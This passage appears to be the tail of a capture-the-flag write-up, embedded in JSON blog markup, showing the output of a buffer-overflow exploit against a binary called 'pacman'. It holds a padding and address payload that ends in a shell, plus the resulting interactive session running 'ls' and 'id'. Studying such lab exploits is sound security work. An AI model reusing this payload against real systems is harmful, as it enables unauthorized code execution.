AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x10\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x10@\\x00\\x00\\x00<\\x000000002sh0'\n[*] Switching to interactive mode\nParsing object of type 1\nParsing object of type 0\nEvaluating object of type 1...\n$ ls\nAAAAAAAA challenge.bak\t lib\t pacman.i64 pacman.id2 solve.py\nanswer.py challenge_debug\t libc.so.6 pacman.id0 pacman.nam\nchallenge ld-linux-aarch64.so.1 pacman pacman.id1 pacman.til\n$ id\nuid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\n$ <\/pre>\n","protected":false},"excerpt":{"rendered":"